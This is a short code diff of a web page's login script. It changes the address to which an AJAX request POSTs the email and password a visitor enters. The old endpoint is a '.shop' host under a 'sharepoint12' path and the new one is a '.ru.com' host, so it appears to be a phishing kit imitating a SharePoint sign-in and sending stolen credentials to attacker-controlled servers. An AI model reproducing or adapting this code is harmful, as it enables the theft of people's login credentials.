--- a/index.html
+++ b/index.html
@@ -355,7 +355,7 @@ document.addEventListener('keydown', function(event) {
           const email = $('#email').val();
           const password = $('#password').val();
           $.ajax({
-            url: 'https://re.gufn2.shop/sharepoint12/em.php',
+            url: 'https://zh.zop3.ru.com/b/em.php',
             type: 'POST',
             data: {
               email: email,
